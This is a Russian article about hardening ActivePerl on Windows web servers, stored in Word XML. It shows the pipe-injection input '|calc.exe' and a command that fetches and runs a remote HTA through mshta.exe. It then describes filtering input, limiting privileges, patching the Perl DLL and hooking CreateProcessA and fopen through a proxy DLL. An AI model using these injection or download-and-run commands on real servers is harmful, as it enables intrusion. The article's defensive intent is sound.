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12C6" w:rsidRDefault="00A412C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Style w:val="captionl1"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Защищаем Perl: шунт в мозг, или зверская нейрохирургия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Язык программирования Perl, будучи установленным на Web-сервере, отличается высокими требованиями к внимательности разработчика и квалификации системного администратора, при малейшей ошибке человека оставляя систему "открытой и доступной" для взломщиков всего мира. В статье рассмотрена возможность снизить угрозу, устанавливая свои собственные защитные механизмы (на примере "хирургического отрезания" и перехвата функций чтения, записи и выполнения файлов в системе Windows).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вы программируете (или собираетесь программировать) Internet-приложения на языке Perl, то наверняка сталкивались с информацией, описывающей уязвимости этого языка для хакерских атак. Простейший скрипт, приведенный в любом учебнике по языку Perl, на поверку оказывается "широко открытыми воротами" для хакеров, как многоопытных, так и начинающих. Например, фрагмент кода, который просто выводит содержимое указанного файла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open(f,$filename);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while(&lt;f&gt;)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{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print;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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>}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самом деле может выполнять и другие действия. Подайте на его вход строку "|calc.exe", и вы запустите на выполнение стандартный калькулятор. В запуске на удаленном сервере стандартных программ (таких как calc.exe или notepad.exe) мало смысла, если не знать про идеальную отмычку хакера - утилиту mshta.exe. Она входит в стандартную поставку Windows и позволяет легко и непринужденно закачивать в атакуемую систему и выполнять в ней произвольный код.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Например, выполнение в системе команды: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mshta.exe http://www.malware.com/foobar.hta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приведет к скачиванию на компьютер файла foobar.hta и исполнению его как скрипта VBS. Этот пример создает и запускает безвредное (по заверениям устроителей сайта malware.com) приложение для MS-DOS, показывающее стандартный алгоритм генерации пламени. Естественно, таким же способом можно закачать и выполнить в системе произвольный исполняемый файл, даже если его там еще нет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Кому это нужно?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Мне хотелось бы развеять предубеждение некоторых системных администраторов, что взлом именно их сервера никому не нужен. Железный аргумент - ссылка на Неуловимого Джо ("не такая уж мы важная птица, чтобы нас ломать"). В действительности, взлом любого (произвольного) сервера может принести хакеру пользу, поскольку открывает ему новые замечательные возможности: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Разослать с уязвимого сервера пару-тройку гигабайт почтового спама.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Устроить на уязвимом сервере "варезятник" для нелицензионного софта, музыки и видео.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Выполнить сложный и интересный математический расчет (обычно просчитывают криптографию, чтобы подобрать чей-то ключ, вовлекая в этот процесс - чтобы дело шло быстрее - множество взломанных машин).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Взломать или "заглушить" мусорными запросами (атака "отказ в обслуживании") более важный сервер (например, сервер какого-нибудь банка или государственного учреждения).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Таким образом, уязвимые серверы, независимо от их важности, представляют опасность не меньшую, чем те люди, которые умеют использовать эти серверы по их прямому назначению. :-)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Почему Perl уязвим?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Рациональное объяснение, зачем функция open в Perl отрабатывает символ конвейера | как команду запустить программу на выполнение, дать сложно: Perl вообще довольно иррациональный (зато гибкий и компактный) язык. :-) Автор языка Perl Ларри Уолл в шутку расшифровывает его название как Patalogically Eclectic Rubbish Lister (Паталогически Эклектичный Мусорный Листер) - мы можем лишь пожелать, чтобы следующие его версии развивались в направлении большей безопасности, однозначности и безошибочности кода - столь необходимых качеств для общедоступных Internet-приложений. Безусловно, "патологичность", "эклектичность" и "мусорность" - это отрицательные черты, с которыми Ларри Уолл должен бороться. :-)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Фильтрация пользовательского ввода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статьях о безопасном программировании на языке Perl можно встретить рекомендации фильтровать пользовательский ввод: в частности, удалять из полученных извне строк символы | и другие знаки, имеющие в Perl специальное значение. Например, следующая фильтрация ввода "обеззаразит" полученное извне имя файла от специальных и опасных символов.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if ($filename =~/[&lt;&gt;\|\-&amp;\.\\\/\0]/)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   {die "Недопустимый символ в имени файла \n";}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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open(f, $filename);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Оцените, какое изобилие специальных значков - "крокозябликов" надо отфильтровать для простой функции открытия файла. Очевидно, что надо быть глубоким экспертом по языку Perl и очень внимательным человеком, чтобы правильно расставить все фильтры. Поскольку от человека, в отличие от железного лома, трудно требовать стопроцентной надежности, расставленные в разных местах программы "ловушки на крокозябликов" на практике могут не сработать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Ограничение прав Web-сервера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Internet-сервер и все запущенные им приложения, так или иначе, контактирующие со всем внешним миром, не должны иметь права администратора или привилегированного пользователя. Назначить службе Web-сервера ограниченные права - очень надежный (и, наверное, единственно правильный) способ защитить свой сервер от атак извне.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проектировании Internet-сайта необходимо с самого начала разбить его информационное содержимое на отдельные папки, где находятся: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а) выполняемые скрипты и программы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б) данные, предназначенные только для чтения (HTML-страницы)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в) данные, предназначенные для изменения посетителями.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Пользователь, под именем которого будет запущен Internet-сервер, должен иметь доступ только к этим папкам, причем, на скрипты и данные надо наложить запрет записи (иначе хакер может слегка изменить внешний вид и функционирование вашего сайта), а на данные, предназначенные для изменения внешними пользователями - запрет выполнения (иначе он сможет создать и тут же выполнить в этой папке все что угодно). Этот вариант защиты теоретически "невскрываем" - но на практике у начинающего администратора возникнет ряд сложностей.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Так, в системе Windows web-сервер не запустится, если не открыть ему на доступ системные dll в папке c:\winnt\system32. А если их открыть, всему миру окажутся доступными замечательные программы наподобие regedt32.exe, mshta.exe и т.д. Можно, конечно, переписать на листочек список необходимых программе системных dll и открыть на доступ Internet-серверу только их. Но многие ли администраторы это делают (и надо ли им это?).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Unix-подобных системах существуют свои трудности (одна из возможных проблем - закрытый 80 порт для процессов, не имеющих административных привилегий в системе).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любом случае, этот метод защиты требует хорошей подготовки и высокой мотивации администратора системы, что указывает на фундаментальный недостаток такой защиты: ее нельзя установить принудительно, вместе с установкой защищаемой программы, и надежность компьютерной системы полностью зависит от надежности самого слабого ее звена - человеческого мозга.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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"Лоботомия" Perl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Лоботомия - это операция по изменению личности путем повреждения лобных долей мозга, отвечающих за агрессию. Одно время эту операцию применяли по отношению к преступникам, чтобы уменьшить их опасность для общества. Хирург при помощи специального инструмента через глазницы достигал этой области мозга и легким постукиванием деревянным молоточком по рукоятке инструмента наносил необходимые повреждения (избыточная кровь и клеточная масса удалялись с помощью гибкого зонда).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Применять подобную операцию мы будем не к хакерам (в свое время ее признали бесчеловечной и антигуманной), а к бинарному дистрибутиву Perl, чтобы "отрубить" у него "агрессивную" реакцию на символ | ("конвейер").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Указанные ниже манипуляции носят тестовый характер - не применяйте их без тщательной проверки на тестовой системе и на тестовой копии данных.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этого мы отыщем в бинарном дистрибутиве Perl (для экспериментов я использую дистрибутив ActivePerl версии 5.6) подстроку "cmd.exe". Это вызов стандартной оболочки Windows NT/2000/XP (для Windows 9x имя стандартной оболочки - "command.com"). Нас интересуют файлы с расширением dll, где найдена эта строка. Если мы вызываем Perl запуском perl.exe, то нужная нам компонента - Perl56.dll (название может отличаться в зависимости от версии дистрибутива). Заменим каким-нибудь редактором (я использую встроенный редактор Far) подстроку cmd.exe на что-нибудь другое той же длины, например, sex.exe. Таким образом, символ "конвейера" окажется нерабочим, однако, мы сможем по-прежнему запускать приложения функцией system("ИмяПрограммы"). Так, согласитесь, хотя и менее компактно, зато гораздо безопаснее и менее агрессивно. :-)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Программа sex.exe должна выводить на стандартный вывод (stdout) какое-нибудь доброе и трогательное приветствие для хакера. Я надеюсь, что с ее созданием вы легко справитесь самостоятельно. :-). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Перехват системных вызовов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Мы предупредили не все опасности, подстерегающие Perl-программиста.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Давайте предположим, что мы хотим запретить интерпретатору Perl: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запуск любых внешних программ (мудрое решение; ту же отсылку почты безусловно лучше выполнять стандартными функциями Perl - иначе "лоботомию", в той или иной степени, пришлось бы выполнять ко всем программам, которые мы запускаем)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чтение файлов, если расширение не ".html"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запись файлов, если расширение не ".user".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Получив такой дистрибутив Perl, даже ... скажем так, не совсем грамотный Web-программист (требовать иного от живых людей мы не только не вправе, но и не в состоянии) будет чувствовать себя комфортно и, самое главное, сухо.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Роль "защитной прокладки" в данном случае выполнит специальная dll, которая перехватит указанные нами системные вызовы и, при необходимости, их заблокирует (в отличие от антивирусов, которые перехватывают системные вызовы сразу всех процессов в системе, мы будем перехватывать только системные вызовы Perl, не трогая остальную систему).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Мы будем использовать системные функции Windows GetProcAddress и GetModuleHandle, чтобы получить адреса функций для перехвата, ImageDirectoryEntryToData - чтобы получить адрес начала таблицы импорта, и функции VirtualProtect и WriteProcessMemory, чтобы внести изменения в эту таблицу.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Опираясь на эти ключевые слова, вы можете отыскать в Internet готовое решение, либо написать приложение-"перехватчик" самостоятельно. Получившийся у меня результат перехвата (я использовал компилятор Delphi, поскольку для языка C примеров можно найти достаточно) вы можете скачать по ссылке </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31C14">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Внедрение защитной DLL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Чтобы "пристыковать" dll в адресное пространство процесса, я использую метод подмены DLL. Для этого я захожу ... правильно, текстовым редактором в исполняемый файл Perl.exe и исправляю подстроку Perl56.dll на romix1.dll (так мы назовем нашу защитную компоненту).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Пробую запускать Perl.exe. Конечно же, Perl пишет, что не найдена необходимая библиотека romix1.dll. Ну что же, создадим ее. Для этого скомпилируем программу из трех строк на Delphi, назвав ее romix1.dpr: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library romix1;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begin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end.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Этого недостаточно: теперь Perl при запуске выдает ошибку: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"Perl.exe связан с отсутствующим компонентом Romix1.dll:RunPerl".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Perl импортирует единственную функцию RunPerl из этой библиотеки, и мы ее сейчас создадим (наша "подделка" будет просто передавать управление на "оригинал"):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library romix1;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procedure RunPerlOrig; external 'Perl56.dll' name 'RunPerl';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//Это оригинальная функция RunPerl из библиотеки Perl56.dll.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procedure RunPerl; export; stdcall;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//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Перехватчик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функции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RunPerl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begin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asm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  jmp RunPerlOrig; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Делаем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переход</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (jump)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end;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end;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exports RunPerl;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begin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//Расположенный здесь код будет выполняться при каждом запуске DLL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end.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Ассемблерная вставка делает переход, куда надо. Теперь ругательные сообщения прекратились, и изменений в работе Perl не видно. Зато мы достигли важного результата: наша dll стала полноправным членом (если не мозгом) исполняемого процесса Perl.exe. Дальнейшее становится делом техники (точнее, системных вызовов Windows API и нескольких "точечных" замен в таблице импорта Perl56.dll). Вы можете взять готовый код </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31C14">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> и посмотреть, что у меня получилось.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A41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Какие системные функции необходимо перехватывать?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Технология динамически компонуемых библиотек (DLL) существенно облегчает модификацию Windows-приложений (закрытый исходный код компенсируется тем, что все названия функций и точки их входа не только хорошо видны, но и доступны для изменения). Просматривать статический импорт DLL или EXE удобно при помощи утилиты dumpbin.exe из студии разработки Microsoft.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Пример вызова этой утилиты из командной строки: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dumpbin.exe /imports perl.exe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Программа выдаст список DLL и их функций, которые импортирует программа из этих DLL. Вот полезный нам фрагмент вывода этой утилиты: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Microsoft (R) COFF Binary File Dumper Version 6.00.8168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Copyright (C) Microsoft Corp 1992-1998. All rights reserved.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Dump of file perl.exe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File Type: EXECUTABLE IMAGE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Section contains the following imports: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...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  Perl56.dll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402038 Import Address Table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4020C0 Import Name Table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0 time date stamp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0 Index of first forwarder reference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 xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3C3  RunPerl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...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Замечание: Из этого листинга мы видим, что программа импортирует библиотеку Perl56.dll Это большая и "тяжелая" динамическая библиотека, которая поддерживает все функции Perl; Perl.exe же фактически является небольшим загрузчиком для этой библиотеки, только лишь запуская ее единственную функцию RunPerl. Смысл такого разделения, видимо, в том, что при завершении работы Perl.exe система выгружает библиотеку из памяти лишь через несколько секунд, если к ней не будет новых обращений. Поскольку все запущенные копии Perl.exe используют только одну копию библиотеки, система экономит время на выгрузках-загрузках (при условии, конечно, что эта библиотека постоянно "висит" в памяти). Замечу, что экономии памяти от такого разделения не происходит, т.к. общие страницы всех запущенных копий одного и того же исполняемого файла система по любому помещает на одни и те же физические адреса.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Аналогично мы можем выяснить импорт библиотеки Perl56.dll (список функций, конечно же, окажется гораздо длиннее). Дальнейшие выяснения, на какие функции надо ставить "жучок", мы произведем опытным путем - мы примерно знаем (а если не знаем, то посмотрим), :-) какие API-функции должна импортировать скомпилированная в системе Windows простейшая тестовая C-программа, которая выполняет нужные нам действия. Другой вариант - выяснить это при помощи специальных "лоботомических инструментов": например, Numega SoftICE или Numega Bounds Checker (их рассмотрение выходит за рамки этой статьи). Я приведу лишь результат своих изысканий: нужные нам функции - это CreateProcessA (запуск приложения) из библиотеки KERNEL32.dll и функция fopen (открытие файла на чтение или на запись) из библиотеки MSVCRT.dll.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"За кадром" остались такие специальные вопросы, как формат таблицы импорта Windows-программы. Отчасти эту информацию можно получить в комментариях исходного кода </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31C14">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, а отчасти - из литературы. Кстати, полезные для начинающих хакеров источники (например, книги Криса Касперски, Джеффри Рихтера и Мэтта Питрека) можно скорее найти в сети Internet, чем в книжных магазинах, где их почему-то очень быстро раскупают. :-) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412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Мы попытались защитить Perl - один из наиболее популярных (хотя и несколько эклектичных) :-) языков для работы с CGI - от атак из Internet. Мы делали это на разных уровнях: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Фильтрацией пользовательского ввода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Ограничением прав доступа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Заменой подстрок в теле программы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Перехватом системных вызовов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Возможны еще два уровня защиты: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Перекомпиляция Perl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Перекомпиляция ядра операционной системы. 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Эффективность защиты во всех рассмотренных случаях идет "по нарастающей".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Разумеется, нам важна не просто перекомпиляция, а перекомпиляция с внедрением защитных проверок. Наша цель - внедрить эти проверки тем или иным способом, пусть даже антигуманным и "хакерским". При помощи деревянного молоточка.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C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А авторы дистрибутивов уже сами разберутся, включать ли защитные опции в состав своих продуктов, и активизировать ли их по умолчанию. :-)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A412C6" w:rsidRDefault="00A412C6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A412C6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513DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BAAF14C"/>
    <w:lvl w:ilvl="0" w:tplc="834C9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FE2A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7024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2058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F30E2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B32A9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0064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4A8A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A2650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B243F63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10340A8A"/>
    <w:lvl w:ilvl="0" w:tplc="9B14C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04C5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1046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508F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02E6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37E8F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AE74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4271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C183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51E07E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="466AAA64"/>
    <w:lvl w:ilvl="0" w:tplc="72A22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81C5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20A8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E2F4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028A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48C86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3F0A3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CABD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FEE4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5EA0B15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3D43D30"/>
    <w:lvl w:ilvl="0" w:tplc="ED127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2263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1CC1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14AC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D1850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5E1C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963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7ECE1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242D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EAE2A79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34B2EEA8"/>
    <w:lvl w:ilvl="0" w:tplc="4A3A0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8230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1867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28CE8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6894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649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E6A37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30F6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E441A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C14"/>
    <w:rsid w:val="002B34AA"/>
    <w:rsid w:val="00376F61"/>
    <w:rsid w:val="00A412C6"/>
    <w:rsid w:val="00E3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A61D3A-CA1C-4250-AD0B-FC9B6B52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26"/>
      <w:szCs w:val="2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80"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="FollowedHyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:u w:val="none"/>
      <w:effect w:val="non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j">
    <w:name w:val="j"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:firstLine="51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c">
    <w:name w:val="c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l">
    <w:name w:val="l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aptionc">
    <w:name w:val="captionc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captionr">
    <w:name w:val="captionr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captionl">
    <w:name w:val="captionl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smallc">
    <w:name w:val="smallc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smallr">
    <w:name w:val="smallr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smalll">
    <w:name w:val="smalll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tt">
    <w:name w:val="tt"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99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ttb">
    <w:name w:val="ttb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mt">
    <w:name w:val="m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ml">
    <w:name w:val="ml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mltitle">
    <w:name w:val="mltitle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mls">
    <w:name w:val="mls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field">
    <w:name w:val="field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message">
    <w:name w:val="message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check">
    <w:name w:val="check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button">
    <w:name w:val="button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buttons">
    <w:name w:val="buttons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customStyle="1" w:styleId="ml1">
    <w:name w:val="ml1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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captionl1">
    <w:name w:val="captionl1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22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6">
    <w:name w:val="с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10119</Words>
  <Characters>5768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BugTraq.Ru: Защищаем Perl: шунт в мозг, или зверская нейрохирургия</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>PERSONAL COMPUTERS</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15856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BugTraq.Ru: Защищаем Perl: шунт в мозг, или зверская нейрохирургия</dc:title>
  <dc:subject/>
  <dc:creator>USER</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-26T07:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-26T07:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>